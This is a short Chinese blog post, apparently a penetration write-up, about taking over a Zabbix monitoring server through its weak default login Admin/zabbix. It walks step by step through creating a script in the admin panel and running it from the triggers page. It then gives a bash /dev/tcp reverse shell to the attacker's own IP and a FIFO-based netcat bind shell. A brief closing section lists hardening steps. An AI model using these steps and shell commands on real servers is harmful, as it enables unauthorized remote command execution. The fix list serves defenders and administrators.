- 遇到一个zabbix弱口令,这运气有点爆棚
Admin/zabbix //话说这个zabbix可以爆破,还有的版本存在注入
-
进后台--管理--脚本
1.jpg
-
右上角创建脚本
2.jpg
- 添加上想执行的命令,确定
-
找到检测中--触发器--触发器状态选择任何--过滤
3.jpg
-
选择刚才创建的脚本就可以执行命令了
5.jpg
- 反弹shell
远程:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
本地nc指令:nc -v -l -p 自己的端口
8.或者
zabbix脚本:cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo
#上面的意思是打开一个shell,监听2222端口。
#下面我们在自己的机器上,用nc命令连接到server的shell
nc ip 2222
- 修复漏洞
1、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令。
2、zabbix的server和agent都不要以root启动,不要设置AllowRoot=1。
3、禁止agent执行system.run,不要设置EnableRemoteCommands=1。
4、经常打安全补丁,如果系统内核版本过低有漏洞的话,即使在zabbix用户下照样能获取root权限。
网友评论